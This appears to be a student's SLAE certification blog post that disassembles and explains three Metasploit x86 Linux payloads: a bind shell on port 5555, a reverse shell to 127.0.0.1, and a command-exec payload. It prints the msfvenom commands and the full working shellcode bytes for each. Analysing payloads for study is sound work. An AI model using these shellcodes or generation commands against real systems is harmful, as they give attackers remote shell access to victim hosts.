SLAE Assignment 5 -- MSF Analysis
Introduction
The 5th assignment for SLAE is to analyze 3 msfvenom payloads. For this exercise, I thought I would revisit some semi-familiar code in the linux/x86/shell_bind_tcp, linux/x86/shell_reverse_tcp, and linux/x86/exec payloads.
My primary reason for doing this is that we’ve written similar code already, and I want to see how the pros do it when contributing to Metasploit so we can pick up some new tricks and efficiencies.
Analyzing Shellcode #1 (linux/x86/shell_bind_tcp)
The first thing we need to do is generate the shellcode that corresponds with this MSF payload. We’ll need to add arguments as well, such as the listening port. We can do this with the following command: msfvenom -p linux/x86/shell_bind_tcp lport=5555 -f c
root@kali:~# msfvenom -p linux/x86/shell_bind_tcp lport=5555 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 78 bytes
Final size of c file: 354 bytes
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x15\xb3\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
Now that we have our shellcode, we can feed it to ndisasm, which comes stock on Kali Linux, with the following command and get some assembly out of it!
root@kali:~# echo -ne "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x15\xb3\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" | ndisasm -u -
After running this command, we get the following output:
00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 53 push ebx
00000005 43 inc ebx
00000006 53 push ebx
00000007 6A02 push byte +0x2
00000009 89E1 mov ecx,esp
0000000B B066 mov al,0x66
0000000D CD80 int 0x80
0000000F 5B pop ebx
00000010 5E pop esi
00000011 52 push edx
00000012 68020015B3 push dword 0xb3150002
00000017 6A10 push byte +0x10
00000019 51 push ecx
0000001A 50 push eax
0000001B 89E1 mov ecx,esp
0000001D 6A66 push byte +0x66
0000001F 58 pop eax
00000020 CD80 int 0x80
00000022 894104 mov [ecx+0x4],eax
00000025 B304 mov bl,0x4
00000027 B066 mov al,0x66
00000029 CD80 int 0x80
0000002B 43 inc ebx
0000002C B066 mov al,0x66
0000002E CD80 int 0x80
00000030 93 xchg eax,ebx
00000031 59 pop ecx
00000032 6A3F push byte +0x3f
00000034 58 pop eax
00000035 CD80 int 0x80
00000037 49 dec ecx
00000038 79F8 jns 0x32
0000003A 682F2F7368 push dword 0x68732f2f
0000003F 682F62696E push dword 0x6e69622f
00000044 89E3 mov ebx,esp
00000046 50 push eax
00000047 53 push ebx
00000048 89E1 mov ecx,esp
0000004A B00B mov al,0xb
0000004C CD80 int 0x80
This output is very nice, but it’s not quite what we’re accustomed to. Let’s use awk to get just the assembly instructions.
echo -ne "<SHELLCODE>" | ndisasm -u - | awk '{ print $3,$4,$5 }'
Now we get just the assembly printed to the terminal, and we can throw this into a NASM syntax highlighter.
xor ebx,ebx
mul ebx
push ebx
inc ebx
push ebx
push byte +0x2
mov ecx,esp
mov al,0x66
int 0x80
pop ebx
pop esi
push edx
push dword 0xb3150002
push byte +0x10
push ecx
push eax
mov ecx,esp
push byte +0x66
pop eax
int 0x80
mov [ecx+0x4],eax
mov bl,0x4
mov al,0x66
int 0x80
inc ebx
mov al,0x66
int 0x80
xchg eax,ebx
pop ecx
push byte +0x3f
pop eax
int 0x80
dec ecx
jns 0x32
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
int 0x80
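Before breaking it down, a quick sanity check can confirm that the bytes we fed to ndisasm match what msfvenom reported. This is a minimal Python sketch; the helper name c_literal_to_bytes is my own and not part of any tool. It turns the escaped C string back into raw bytes so the length can be compared with the "Payload size: 78 bytes" line.

```python
# The C-style literal from the msfvenom output, pasted as raw strings.
c_literal = (
    r"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
    r"\x5b\x5e\x52\x68\x02\x00\x15\xb3\x6a\x10\x51\x50\x89\xe1\x6a"
    r"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
    r"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
    r"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
    r"\x0b\xcd\x80"
)


def c_literal_to_bytes(literal):
    """Convert a string of \\xNN escapes into the bytes they represent."""
    return bytes.fromhex(literal.replace("\\x", ""))


shellcode = c_literal_to_bytes(c_literal)
print(len(shellcode))
```

The length also lines up with the disassembly: the last instruction sits at offset 0x4C and is 2 bytes long.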
Let’s break this down and see how it differs from our bind shell that we wrote.
The first thing we’ll notice is the repeated use of a single syscall, socketcall(), instead of 4 separate syscalls like we used. socketcall() works by storing a call number (SYS_SOCKET, SYS_BIND, and so on) in ebx, building the arguments for the subordinate call (bind or listen, for example) on the stack, and then pointing ecx at esp, where those arguments begin. It’s a much more uniform and, in my opinion, cleaner way of writing the shellcode.
Syscall 1 socketcall() with SYS_SOCKET
First, let’s look at the argument structure of socketcall(). The man page gives it as int socketcall(int call, unsigned long *args);. call selects which socket function you want to use; in this case we want SYS_SOCKET, which has a value of 1. args points to the arguments for that function, which are the same socket() arguments we’re familiar with from our code.
Let’s look at how this plays out in assembly.
xor ebx,ebx
mul ebx
push ebx
inc ebx
push ebx
push byte +0x2
mov ecx,esp
mov al,0x66
int 0x80
One thing that’s different is the way they’re clearing the registers. mul ebx multiplies eax by ebx and stores the result in edx:eax. Since ebx has just been zeroed, the product is zero, so both eax and edx are cleared by one instruction instead of two separate xor register, register instructions.
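The effect of mul is easy to model. The following Python sketch is my own simplified model of the one-operand mul (it ignores the flags), and the starting eax value is an arbitrary placeholder; it shows that whatever eax held beforehand, multiplying by a zeroed ebx leaves both eax and edx at zero.

```python
MASK32 = 0xFFFFFFFF


def mul(eax, operand):
    """Model the one-operand x86 mul: edx:eax = eax * operand (unsigned)."""
    product = (eax & MASK32) * (operand & MASK32)
    # Low 32 bits go to eax, high 32 bits go to edx.
    return product & MASK32, (product >> 32) & MASK32


# eax holds leftover junk (placeholder value); ebx was zeroed by xor ebx,ebx.
eax, edx = mul(0xDEADBEEF, 0)
print(hex(eax), hex(edx))
```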
Next they increment ebx so that it equals 0x1, which is the SYS_SOCKET call number. ebx was pushed onto the stack before the increment to supply the protocol value, which should be 0 as it was in our bind shell. After the increment, ebx is pushed again to supply the SOCK_STREAM argument (1). Then 0x2, the value of PF_INET, is pushed onto the stack just as we did.
Lastly, ecx is given the address in esp so that it references the arguments we just created on the stack, and then the interrupt is called. Also, let’s not forget that the sockfd will be needed later; the syscall returns it in eax.
Syscall 2 socketcall() with SYS_BIND
This is the structure from the man page on bind(): int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
As we know already, building this struct in reverse order on the stack is the most difficult part of the entire shellcode.
- int sockfd is taken care of; that’s stored in eax.
- The struct will consist of 0 (the 0.0.0.0 listening address), port 5555 (0x15b3 in network byte order, which shows up as 0xb315 in the little-endian dword), and AF_INET (2).
- socklen_t addrlen will be 16.
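The byte-order juggling in that struct is easier to trust after packing it by hand. This Python sketch builds a sockaddr_in for 0.0.0.0:5555 using the standard layout (family, port, address, 8 bytes of padding) and reads the first four bytes back as a little-endian dword, which is the value we expect to see pushed in the disassembly. The variable names are mine.

```python
import socket
import struct

AF_INET = 2
PORT = 5555

# sockaddr_in: 2-byte family (host order), 2-byte port (network order),
# 4-byte address, 8 bytes of padding = 16 bytes in total.
sockaddr = (
    struct.pack("<H", AF_INET)
    + struct.pack(">H", PORT)
    + socket.inet_aton("0.0.0.0")
    + b"\x00" * 8
)

# The first four bytes, read as a little-endian dword, give the pushed value.
first_dword = struct.unpack("<I", sockaddr[:4])[0]
print(hex(first_dword), len(sockaddr))
```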
Let’s see how they pulled this off in the assembly.
pop ebx ; I like this, this pops 0x2 into $ebx and satisfies our SYS_BIND requirement
pop esi ; discards the leftover 1 (SOCK_STREAM) so the next two pushes land exactly where $ecx still points
push edx ; $edx is still zeroed out so this will be the address part of our struct (0.0.0.0)
push dword 0xb3150002 ; putting our listening port (5555) onto the stack and our AF_INET value (2)
push byte +0x10 ; finishing up with pushing 16 length onto the stack
push ecx ; pushing a pointer to our sockaddr ($ecx still holds the address the struct was just written to)
push eax ; this is our sockfd, or did you forget?!
mov ecx,esp ; ecx has to point to the location of all these args we've created
push byte +0x66
pop eax ; calling socketcall()
int 0x80
Awesome, not too many unique things there, though I will say that for the most part they make more use of pushing values onto the stack and then popping them into registers than I have.
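One way to see what the pop/push sequence at the start of that snippet does to the stack is to model it. The sketch below is my own toy model (the Stack class and the assumed sockfd of 3 are illustrative, not part of the payload). It suggests that the two pops make room so the sockaddr lands at the very address ecx already holds from the socket() call, which is why push ecx can serve as the struct pointer.

```python
class Stack:
    """A tiny model of the x86 stack: 4-byte slots, growing downwards."""

    def __init__(self, esp=0x1000):
        self.esp = esp
        self.mem = {}

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value & 0xFFFFFFFF

    def pop(self):
        value = self.mem[self.esp]
        self.esp += 4
        return value


s = Stack()
edx = 0

# socket(): push 0, push 1, push 2, then mov ecx,esp
for arg in (0, 1, 2):
    s.push(arg)
ecx = s.esp
eax = 3  # assumed sockfd returned by socket()

# bind(): the first four instructions of the snippet
ebx = s.pop()        # 2, the SYS_BIND call number
esi = s.pop()        # 1, simply discarded
s.push(edx)          # address 0.0.0.0
s.push(0xB3150002)   # port 5555 and AF_INET

print(hex(s.esp), hex(ecx))
```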
Syscall 3 socketcall() with SYS_LISTEN
If you don’t remember, the argument structure for listen() is listen(sockfd, queueLimit). This part of the code is pretty self-explanatory. ecx still points to the args because it isn’t touched in this code segment and still holds the esp value from the previous code segment.
mov [ecx+0x4],eax ; $eax is 0 after a successful bind(), so this writes 0 into the second argument slot (queueLimit); our sockfd is still in the first slot at [ecx]
mov bl,0x4 ; for SYS_LISTEN which has a value of 4
mov al,0x66 ; calling socketcall()
int 0x80
Syscall 4 socketcall() with SYS_ACCEPT
The unique thing about accept() is that it returns a new sockfd for the client connection, which we’ll need to store and reference from here on instead of the one we’ve been using.
inc ebx ; ebx now becomes 5 for SYS_ACCEPT
mov al,0x66
int 0x80
Again, ecx already points to the beginning of the arguments so we’re good to go.
Syscall 5 dup2()
dup2() is going to take the sockfd returned by our accept() call and duplicate it onto file descriptors 0, 1, and 2 (stdin, stdout, and stderr respectively), with ecx holding the descriptor number for each iteration, in order to make the shell interactive. Let’s see how they implement this.
xchg eax,ebx ; $ebx now has our new sockfd
pop ecx ; this is going to be our counter register; it pops the listening sockfd off the top of the stack (typically 3)
push byte +0x3f ; pushing the syscall value for dup2()
pop eax
int 0x80 ; done calling dup2()
dec ecx ; decrement our counter
jns 0x32 ; jump near if not sign, a.k.a. SF=0
Lesson learned here: the original ndisasm output told us that 0x32 was a reference to:
00000032 6A3F push byte +0x3f
So now we know that as long as ecx has not gone negative (SF=0), this is where we loop back to. Very cool way of constructing the loop.
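The loop is short enough to trace by hand, but here is a Python model of it anyway. It is only a sketch of the control flow (no real syscalls are made), and the starting counter of 3 is my assumption for the value popped into ecx; the function name is mine.

```python
def dup2_loop_targets(ecx):
    """Model the loop: dup2(sockfd, ecx), dec ecx, jump back while ecx >= 0."""
    targets = []
    while True:
        targets.append(ecx)  # int 0x80 with eax = 0x3f (dup2)
        ecx -= 1             # dec ecx
        if ecx < 0:          # SF = 1, so jns falls through
            break
    return targets


# Assumed starting value: 3, a typical number for a process's first socket.
print(dup2_loop_targets(3))
```

Whatever the starting value, the last three iterations always cover 2, 1, and 0, which are the descriptors the shell actually needs.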
Syscall 6 execve()
This syscall is one of the most standardized syscalls you can make in assembly so I doubt there will be much variance here.
push dword 0x68732f2f ; pushing 'hs//' onto the stack
push dword 0x6e69622f ; pushing 'nib/' onto the stack, now we have /bin//sh on the stack!
mov ebx,esp ; $ebx now points to the string we want to execute
push eax ; terminator ($eax is 0 after the last dup2() call)
push ebx ; push the pointer to '/bin//sh' onto the stack as argv[0]
mov ecx,esp ; $ecx now points to the argv array
mov al,0xb
int 0x80
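Reading pushed dwords backwards in your head gets old quickly, so here is a small Python helper that does it. The function name stack_string is mine; it reverses the push order and lays each dword out in little-endian byte order, which is how the bytes end up in memory.

```python
import struct


def stack_string(pushed_dwords):
    """Rebuild the bytes left in memory by a sequence of push dword instructions.

    The last value pushed sits at the lowest address, so the pushes are
    reversed before each dword is laid out in little-endian order.
    """
    return b"".join(struct.pack("<I", d) for d in reversed(pushed_dwords))


# Pushes in the order they appear in the bind shell.
print(stack_string([0x68732F2F, 0x6E69622F]))
```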
Some things we picked up for our future code writing:
- the mul register clear to save bytes
- creatively utilizing the stack to avoid mov operations
- utilizing socketcall() instead of separate syscalls
- utilizing the xchg opcode
Analyzing Shellcode #2 (linux/x86/shell_reverse_tcp)
The first thing we need to do is generate the shellcode that corresponds with this MSF payload. We’ll need to add arguments as well, such as the host and port to connect back to. We can do this with the following command: msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=5555 -f c
root@kali:~# msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=5555 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of c file: 311 bytes
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x68"
"\x02\x00\x15\xb3\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
Run our ndisasm command:
root@kali:~# echo -ne "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x68\x02\x00\x15\xb3\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" |ndisasm -u -
Output:
00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 53 push ebx
00000005 43 inc ebx
00000006 53 push ebx
00000007 6A02 push byte +0x2
00000009 89E1 mov ecx,esp
0000000B B066 mov al,0x66
0000000D CD80 int 0x80
0000000F 93 xchg eax,ebx
00000010 59 pop ecx
00000011 B03F mov al,0x3f
00000013 CD80 int 0x80
00000015 49 dec ecx
00000016 79F9 jns 0x11
00000018 687F000001 push dword 0x100007f
0000001D 68020015B3 push dword 0xb3150002
00000022 89E1 mov ecx,esp
00000024 B066 mov al,0x66
00000026 50 push eax
00000027 51 push ecx
00000028 53 push ebx
00000029 B303 mov bl,0x3
0000002B 89E1 mov ecx,esp
0000002D CD80 int 0x80
0000002F 52 push edx
00000030 686E2F7368 push dword 0x68732f6e
00000035 682F2F6269 push dword 0x69622f2f
0000003A 89E3 mov ebx,esp
0000003C 52 push edx
0000003D 53 push ebx
0000003E 89E1 mov ecx,esp
00000040 B00B mov al,0xb
00000042 CD80 int 0x80
Let’s cut out the assembly by piping the output to awk with: echo -ne "<SHELLCODE>" | ndisasm -u -| awk '{print $3,$4,$5,$6}' and paste it into a NASM syntax highlighter.
xor ebx,ebx
mul ebx
push ebx
inc ebx
push ebx
push byte +0x2
mov ecx,esp
mov al,0x66
int 0x80
xchg eax,ebx
pop ecx
mov al,0x3f
int 0x80
dec ecx
jns 0x11
push dword 0x100007f
push dword 0xb3150002
mov ecx,esp
mov al,0x66
push eax
push ecx
push ebx
mov bl,0x3
mov ecx,esp
int 0x80
push edx
push dword 0x68732f6e
push dword 0x69622f2f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0xb
int 0x80
Alright, let’s analyze this code. As you have probably already figured out, they’re using socketcall() again. This should be familiar territory for us at this point.
Syscall 1 socketcall() with SYS_SOCKET
Let’s keep in mind the argument structure for SYS_SOCKET: socket(PF_INET (2), SOCK_STREAM (1), IPPROTO_IP (0))
xor ebx,ebx ; clear out ebx
mul ebx ; clear out eax and edx
push ebx ; pushing 0 onto stack for the IPPROTO_IP
inc ebx ; $ebx is now 1, which is both SYS_SOCKET and SOCK_STREAM
push ebx ; pushing 1 onto the stack for SOCK_STREAM
push byte +0x2 ; pushing 2 onto the stack for PF_INET
mov ecx,esp ; $ecx has to point at our args location
mov al,0x66
int 0x80
xchg eax,ebx ; storing the sockfd in ebx
We are getting good at this! Most of this makes sense to us at this point and matches up nicely with our bind shell analysis.
Syscall 2 dup2()
This is interesting, it looks like this code calls dup2() before connect(), which is different from our code.
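pop ecx ; pops 2 (the PF_INET value still on top of the stack) into our counter register
mov al,0x3f ; 0x3f is the value for dup2
int 0x80 ; call dup2
dec ecx ; decrease counter register
jns 0x11 ; jump if not sign, back to mov al,0x3f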
This is a similar set-up to the dup2() loop in the MSF bind shell that we evaluated. 0x11 here is just a reference to the location of that first instruction, mov al,0x3f, so the code keeps looping for as long as the jns condition is satisfied (ecx has not gone negative). Here’s the relevant line from the ndisasm dump:
00000011 B03F mov al,0x3f
Syscall 3 socketcall() with SYS_CONNECT
connect() behaves very similarly to bind(), so keep in mind the argument structure for both, particularly the struct portion: int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen).
push dword 0x100007f ; pushing 127.0.0.1 remote IP
push dword 0xb3150002 ; pushing port 5555 and AF_INET
mov ecx,esp ; pointing $ecx to the struct's location on the stack
mov al,0x66 ; socketcall()
push eax ; addrlen (reuses the 0x66 already in $eax rather than pushing 16)
push ecx ; sockaddr_in* addr
push ebx ; pushing the sockfd
mov bl,0x3 ; SYS_CONNECT
mov ecx,esp
int 0x80
This is all pretty similar to the code we analyzed for the MSF bind payload.
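The pushed IP dword looks backwards at first glance, so it is worth decoding once. In this Python sketch (the helper name dword_to_ip is mine), the dword is laid out the way a little-endian push places it in memory and then read as a dotted-quad address.

```python
import socket
import struct


def dword_to_ip(dword):
    """Lay the dword out in little-endian memory order and read it as IPv4."""
    return socket.inet_ntoa(struct.pack("<I", dword))


print(dword_to_ip(0x0100007F))
```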
Syscall 4 execve()
This is similar to the MSF bind payload we analyzed, but not identical.
push edx ; pushing a null terminator onto the stack
push dword 0x68732f6e ; pushing 'hs/n' onto the stack
push dword 0x69622f2f ; pushing 'ib//' onto the stack, now we have //bin/sh on the stack!
mov ebx,esp ; preserving this stack pointer in $ebx
push edx ; another null terminator
push ebx ; the stack pointer address we had stored in $ebx
mov ecx,esp ; $ecx has to have the address of the stack pointer for our completed args
mov al,0xb ; execve()
int 0x80
All in all, the lessons learned were the same. The payload emphasizes more succinct assembly. Why use 3 lines of code when you can accomplish the same goal in 2? There are definitely some areas where we can improve our code going forward.
Analyzing Shellcode #3 (linux/x86/exec)
For this payload you have to specify a CMD parameter, which represents an arbitrary command you want to run on the victim host. Let’s choose ls as our command and see how the folks contributing to Metasploit pull this off with their shellcode.
root@kali:~# msfvenom -p linux/x86/exec CMD=ls -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 38 bytes
Final size of c file: 185 bytes
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c"
"\x73\x00\x57\x53\x89\xe1\xcd\x80";
Let’s plug the shellcode into ndisasm and dump the assembly code with the following command:
root@kali:~# echo -ne "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c\x73\x00\x57\x53\x89\xe1\xcd\x80" | ndisasm -u -
Output:
00000000 6A0B push byte +0xb
00000002 58 pop eax
00000003 99 cdq
00000004 52 push edx
00000005 66682D63 push word 0x632d
00000009 89E7 mov edi,esp
0000000B 682F736800 push dword 0x68732f
00000010 682F62696E push dword 0x6e69622f
00000015 89E3 mov ebx,esp
00000017 52 push edx
00000018 E803000000 call 0x20
0000001D 6C insb
0000001E 7300 jnc 0x20
00000020 57 push edi
00000021 53 push ebx
00000022 89E1 mov ecx,esp
00000024 CD80 int 0x80
Using our aforementioned awk command to just retrieve the assembly for syntax highlighting.
push byte +0xb
pop eax
cdq
push edx
push word 0x632d
mov edi,esp
push dword 0x68732f
push dword 0x6e69622f
mov ebx,esp
push edx
call 0x20
insb
jnc 0x20
push edi
push ebx
mov ecx,esp
int 0x80
Ok, let’s jump into some analysis. Right off the bat we see they are using execve by placing 0xb into eax. Let’s look at the next section of code.
cdq ; sign-extends $eax into $edx; $eax is 0xb (positive) so $edx becomes zero, a clever new trick for us
push edx ; push a null onto the stack
push word 0x632d ; pushing the string for '-c' onto the stack which will be used along with '/bin/sh' to specify our 'ls' cmd
mov edi,esp ; store a pointer to the '-c' string in $edi
push dword 0x68732f ; '/sh' plus a null terminator
push dword 0x6e69622f ; pushing '/bin/sh' onto the stack
mov ebx,esp ; storing a pointer to the '/bin/sh' string in $ebx
push edx ; push null onto stack
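The cdq trick only zeroes edx because eax holds a small positive number at that point. A quick Python model (my own, covering only the edx result) makes the condition explicit.

```python
def cdq(eax):
    """Model cdq: fill edx with copies of the sign bit (bit 31) of eax."""
    return 0xFFFFFFFF if eax & 0x80000000 else 0x00000000


# eax holds the execve syscall number (0xb) when cdq runs in this payload.
print(hex(cdq(0x0000000B)))
```

If eax had its top bit set, edx would come out as 0xFFFFFFFF instead, so this shortcut is only safe right after loading a known positive value.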
This is relatively familiar to us so far. Let’s go deeper.
call 0x20 ; pushes the address of the next byte (0x1d) onto the stack and jumps to the 'push edi' instruction at 0x20
insb
jnc 0x20
insb and jnc 0x20 are very interesting. Let’s examine the bytes stored there from our ndisasm output:
0000001D 6C insb
0000001E 7300 jnc 0x20
A hex converter will tell us that 6C is l while 73 is s. So these aren’t really instructions at all; they are the bytes of our ls command followed by the 00 terminator, which ndisasm tried to decode as code. A call opcode pushes the address of whatever follows it onto the stack, so we’ve successfully placed the address of our command string onto the stack. This is a very cool trick we can begin to incorporate into our shellcode.
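To double-check that reading, the call can be decoded by hand. This Python sketch uses the exec payload bytes from the msfvenom output; the function name is mine. It parses the E8 rel32 call at offset 0x18, computes the return address that call pushes, and slices out the bytes that get skipped over.

```python
import struct

# The exec payload from the msfvenom output (CMD=ls), as hex.
shellcode = bytes.fromhex(
    "6a0b58995266682d6389e7682f736800682f62696e89e352"
    "e8030000006c7300575389e1cd80"
)


def embedded_string_after_call(code, call_offset):
    """Return (return_address, target, data) for an E8 rel32 call."""
    assert code[call_offset] == 0xE8, "not a near call"
    rel32 = struct.unpack_from("<i", code, call_offset + 1)[0]
    return_address = call_offset + 5   # what call pushes onto the stack
    target = return_address + rel32    # where execution continues
    return return_address, target, code[return_address:target]


print(embedded_string_after_call(shellcode, 0x18))
```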
Let’s finish up.
push edi ; pushes $edi onto the stack which stores the address of '-c' remember (argv[1])
push ebx ; pushes address of '/bin/sh' onto stack (argv[0])
mov ecx,esp ; finally, $ecx points to the argv array, which completes the entire command '/bin/sh -c ls'
int 0x80
Lessons Learned
Using a call to store instruction addresses on the stack is a very cool trick that we were familiar with from writing JMP CALL POP shellcode, but I needed reminding that it is valuable outside of decoder stub construction!
Another thing was that all three payloads contained NULL bytes: several in linux/x86/shell_reverse_tcp and linux/x86/exec, and even one in linux/x86/shell_bind_tcp (the \x00 in the AF_INET word). This is a great reminder to specify bad characters when generating payloads with msfvenom.
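Spotting NULL bytes by eye in a wall of hex is error-prone, so a few lines of Python can do it instead. This is a minimal sketch using the exec payload from this post; the function name null_offsets is mine.

```python
def null_offsets(code):
    """Return the offsets of every 0x00 byte in the payload."""
    return [i for i, b in enumerate(code) if b == 0]


# The exec payload from this post (CMD=ls), as hex.
exec_payload = bytes.fromhex(
    "6a0b58995266682d6389e7682f736800682f62696e89e352"
    "e8030000006c7300575389e1cd80"
)

print([hex(o) for o in null_offsets(exec_payload)])
```

The offsets line up with the disassembly: the '/sh' string terminator, the call displacement, and the terminator after ls.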
This was a great exercise, and it was very fun to look at how the shellcode we use every day, generated by msfvenom, actually works.
Github
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1458
You can find all of the code used in this blog post here.